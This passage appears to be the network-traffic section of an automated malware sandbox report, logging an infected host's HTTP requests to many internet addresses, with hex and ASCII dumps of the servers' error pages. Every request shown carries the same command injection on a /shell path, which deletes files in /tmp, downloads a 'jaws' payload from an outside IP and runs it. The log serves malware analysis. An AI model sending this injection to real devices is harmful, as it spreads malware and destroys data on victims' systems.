                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 63 36 63 64 33 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 33 26 23 34 36 3b 36 64 64 36 66 30 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;4c6cd317&#46;1706279543&#46;6dd6f03</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            441192.168.2.2352596138.100.217.16280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.783016920 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            442192.168.2.2342092103.161.34.8080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.795964003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:24.003002882 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            443192.168.2.236041088.157.120.5780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.859066010 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            444192.168.2.2339790188.210.221.15480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.860112906 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:24.093605042 CET932INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 681
                                                            date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            445192.168.2.2338624138.3.212.12180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.948313951 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:24.223692894 CET190INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:24 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Data Raw: 66 0d 0a 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a
                                                            Data Ascii: f400 Bad Request
                                                            Jan 26, 2024 15:32:24.224713087 CET17INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            446192.168.2.233499052.163.56.3480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:24.018002033 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:24.332170963 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:24 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            447192.168.2.2353114119.45.129.20680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.279467106 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.589683056 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            448192.168.2.2355668117.180.233.2280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.279505968 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:29.407274961 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            449192.168.2.235057834.128.166.8280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.383054972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            450192.168.2.234782274.57.213.2080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.423381090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.574141026 CET598INData Raw: 39 33 2e 31 32 33 2e 38 20 33 30 32 20 0d 0a 53 65 72 76 65 72 3a 20 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 36 20 4a 61 6e 20 32 30 32 34 20 31 34 3a 33 32 3a 32 35 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61
                                                            Data Ascii: 93.123.8 302 Server: Date: Fri, 26 Jan 2024 14:32:25 GMTCache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0Location: https://127.0.0.1:80:4343/shellContent-Type: text/html; charset=utf-8X-Frame-Options: SAMEOR


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            451192.168.2.2352582212.108.44.17080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.494019985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.711839914 CET307INHTTP/1.1 404 Not Found
                                                            Date: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            452192.168.2.2353554133.223.33.19180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.532568932 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.793402910 CET1286INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 6164
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            ETag: "60891687-1814"
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 61 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 0d 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 28 46 69 6c 65 29 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2f 73 74 61 74 75 73 2e 63 73 73 22 3e 0d 0a 09 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 09 3c 62 6f 64 79 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 73 74 61 74 75 73 5f 68 65 61 64 22 3e 0d 0a 09 09 09 3c 21 2d 2d 20 3c 64 69 76 3e 3c 73 76 67 20 69 64 3d 22 e3 83 ac e3 82 a4 e3 83 a4 e3 83 bc 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 34 30 20 31 32 30 22 3e 3c 73 74 79 6c 65 3e 2e 73 74 30 7b 66 69 6c 6c 3a 23 66 66 66 7d 3c 2f 73 74 79 6c 65 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 32 36 36 2e 39 20 31 31 34 2e 32 76 2d 31 33 2e 34 6c 2d 35 2e 37 20 31 31 2e 36 68 2d 32 6c 2d 35 2e 37 2d 31 31 2e 36 76 31 33 2e 34 68 2d 32 2e 39 76 2d 31 38 68 33 2e 36 6c 35 2e 39 20 31 31 2e 39 20 35 2e 39 2d 31 31 2e 39 68 33 2e 36 76 31 38 68 2d 32 2e 37 7a 4d 32 38 32 2e 35 20 31 31 32 2e 35 63 2d 31 20 31 2e 32 2d 32 2e 35 20 31 2e 38 2d 34 2e 35 20 31 2e 38 2d 33 20 30 2d 34 2e 38 2d 31 2e 38 2d 34 2e 38 2d 34 2e 32 20 30 2d 32 2e 35 20 31 2e 39 2d 34 2e 31 20 35 2e 32 2d 34 2e 31 68 34 2e 31 76 2d 2e 34 63 30 2d 31 2e 37 2d 31 2e 31 2d 32 2e 38 2d 33 2e 33 2d 32 2e 38 2d 31 2e 33 20 30 2d 32 2e 37 2e 35 2d 34 20 31 2e 34 6c 2d 31 2e 32 2d 32 2e 31 63 31 2e 39 2d 31 2e 31 20 33 2e 33 2d 31 2e 37 20 35 2e 39 2d 31 2e 37 20 33 2e 35 20 30 20 35 2e 35 20 31 2e 38 20 35 2e 35 20 34 2e 38 76 39 68 2d 32 2e 39 76 2d 31 2e 37 7a 6d 2d 2e 31 2d 33 2e 31 76 2d 31 2e 33 68 2d 33 2e 37 63 2d 31 2e 39 20 30 2d 32 2e 38 2e 35 2d 32 2e 38 20 31 2e 38 20 30 20 31 2e 32 20 31 20 32 20 32 2e 36 20 32 20 32 2e 32 2e 31 20 33 2e 38 2d 31 20 33 2e 39 2d 32 2e 35 7a 4d 32 39 32 2e 33 20 31 30 33 2e 32 63 2e 39 2d 31 2e 39 20 32 2e 36 2d 32 2e 38 20 34 2e 37 2d 32 2e 38 76 32 2e 38 63 2d 32 2e 37 2d 2e 32 2d 34 2e 35 20 31 2e 35 2d 34 2e 37 20 33 2e 38 76 37 2e 31 68 2d 33 76 2d 31 33 2e 37 68 33 76 32 2e 38 7a 4d 33 30 32 2e 35 20 31 31 30 2e 33 76 33 2e 38 68 2d 33 76 2d 31 39 68 33 76 31 31 2e 35 6c 36 2d 36 2e 31 68 33
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="robots" content="noindex, nofollow"><meta http-equiv="content-language" content="ja"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Cache-Control" content="no-cache"><meta http-equiv="Expires" content="0"><title>404 (File)Not Found</title><link rel="stylesheet" href="/styles/status.css"></head><body><div id="status_head">... <div><svg id="_1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 120"><style>.st0{fill:#fff}</style><path class="st0" d="M266.9 114.2v-13.4l-5.7 11.6h-2l-5.7-11.6v13.4h-2.9v-18h3.6l5.9 11.9 5.9-11.9h3.6v18h-2.7zM282.5 112.5c-1 1.2-2.5 1.8-4.5 1.8-3 0-4.8-1.8-4.8-4.2 0-2.5 1.9-4.1 5.2-4.1h4.1v-.4c0-1.7-1.1-2.8-3.3-2.8-1.3 0-2.7.5-4 1.4l-1.2-2.1c1.9-1.1 3.3-1.7 5.9-1.7 3.5 0 5.5 1.8 5.5 4.8v9h-2.9v-1.7zm-.1-3.1v-1.3h-3.7c-1.9 0-2.8.5-2.8 1.8 0 1.2 1 2 2.6 2 2.2.1 3.8-1 3.9-2.5zM292.3 103.2c.9-1.9 2.6-2.8 4.7-2.8v2.8c-2.7-.2-4.5 1.5-4.7 3.8v7.1h-3v-13.7h3v2.8zM302.5 110.3v3.8h-3v-19h3v11.5l6-6.1h3
                                                            Jan 26, 2024 15:32:25.793417931 CET1286INData Raw: 2e 34 6c 2d 35 2e 31 20 35 2e 33 20 35 2e 34 20 38 2e 34 68 2d 33 2e 35 6c 2d 34 2d 36 2e 33 2d 32 2e 32 20 32 2e 34 7a 4d 33 32 36 2e 38 20 31 30 38 2e 35 68 2d 31 30 2e 33 63 2e 35 20 32 2e 31 20 32 2e 31 20 33 2e 34 20 34 2e 32 20 33 2e 34 20
                                                            Data Ascii: .4l-5.1 5.3 5.4 8.4h-3.5l-4-6.3-2.2 2.4zM326.8 108.5h-10.3c.5 2.1 2.1 3.4 4.2 3.4 1.5 0 2.9-.6 3.9-1.6l1.6 1.7c-1.3 1.5-3.3 2.3-5.7 2.3-4.2 0-7-2.8-7-6.9 0-4.1 2.9-6.9 6.9-7 4.8 0 6.7 3.1 6.4 8.1zm-2.6-2.2c-.1-2.2-1.6-3.5-3.8-3.5-2.2 0-3.7 1.4
                                                            Jan 26, 2024 15:32:25.793426991 CET1286INData Raw: 31 2d 2e 36 6c 2e 37 20 32 2e 33 7a 4d 34 34 36 2e 39 20 31 30 37 2e 33 63 30 20 34 2e 31 2d 32 2e 39 20 36 2e 39 2d 37 2e 31 20 36 2e 39 2d 34 2e 32 20 30 2d 37 2e 31 2d 32 2e 38 2d 37 2e 31 2d 36 2e 39 20 30 2d 34 2e 31 20 32 2e 39 2d 36 2e 39
                                                            Data Ascii: 1-.6l.7 2.3zM446.9 107.3c0 4.1-2.9 6.9-7.1 6.9-4.2 0-7.1-2.8-7.1-6.9 0-4.1 2.9-6.9 7.1-6.9 4.2 0 7.1 2.8 7.1 6.9zm-11.3.1c0 2.6 1.7 4.4 4.2 4.4 2.4 0 4.2-1.8 4.2-4.4 0-2.6-1.7-4.4-4.2-4.4-2.5-.1-4.2 1.7-4.2 4.4zM472.8 105.7v8.5h-3v-7.7c0-2.1-1
                                                            Jan 26, 2024 15:32:25.793436050 CET1286INData Raw: 20 35 2e 32 20 32 20 35 2e 32 20 35 2e 33 7a 22 2f 3e 3c 67 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 33 34 2e 34 20 32 37 2e 39 68 2d 34 38 2e 39 56 33 37 68 31 39 2e 34 76 34 33 2e 33 48 33 31 35 56 33 37 68 31 39
                                                            Data Ascii: 5.2 2 5.2 5.3z"/><g><path class="st0" d="M334.4 27.9h-48.9V37h19.4v43.3H315V37h19.4zM548.1 28c-3.6 0-7 1.4-9.5 4.1-2.3 2.5-3.7 5.8-3.7 9.2v.1c0 6.9 4.7 13 11.4 14.7 0 0 18.9 4.9 19.2 5 2.9.9 4.7 3.1 4.7 5.9v.3c0 2.1-1.8 4.2-3.6 4.2h-30.5v9.1h
                                                            Jan 26, 2024 15:32:25.793447018 CET1275INData Raw: 35 68 39 2e 31 56 33 36 2e 39 68 2e 32 63 31 20 31 2e 31 20 31 37 2e 35 20 31 37 2e 36 20 31 37 2e 35 20 31 37 2e 36 6c 2e 32 2e 32 61 36 2e 33 20 36 2e 33 20 30 20 30 20 30 20 37 2e 36 20 30 6c 2e 32 2d 2e 32 73 31 36 2e 34 2d 31 36 2e 36 20 31
                                                            Data Ascii: 5h9.1V36.9h.2c1 1.1 17.5 17.6 17.5 17.6l.2.2a6.3 6.3 0 0 0 7.6 0l.2-.2s16.4-16.6 17.5-17.6h.6v43.2h9.1V33.7c0-3.2-2.6-5.8-5.8-5.8h-4.4zM409 27.8a5.8 5.8 0 0 0-5.8 5.8v46.5h9.1V36.9c1.6 2.2 29.1 41.3 29.1 41.3l.6.4c1.4 1 3.4 1.7 5.1 1.7h3.8c3.2


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            453192.168.2.234089223.58.241.8380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.540390015 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.657691002 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
